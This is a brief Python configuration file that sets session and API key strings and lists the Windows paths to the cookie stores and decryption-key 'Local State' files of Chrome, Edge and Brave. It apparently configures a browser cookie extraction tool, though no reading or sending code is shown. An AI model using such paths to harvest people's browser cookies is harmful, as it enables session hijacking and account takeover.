SESSIONS = "qyURjmbvADL8vt15qyURjmbvL8vGeCFz"
API_KEY = "ADJt15qyURjmbvL8vGeCFz"
PATHC = "C:\\Users\\<your_username>\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"
PATHC_LOCAL = "C:\Users\\<your_username>\\AppData\\Local\\Google\\Chrome\\User Data\\Local State"
PATHE = "C:\\Users\\<your_username>\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies"
PATHE_LOCAL = "C:\\Users\\<your_username>\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State"
PATHB = "C:\\Users\\<your_username>\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Network\\Cookies"
PATHB_LOCAL = "C:\\Users\\<your_username>\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State"
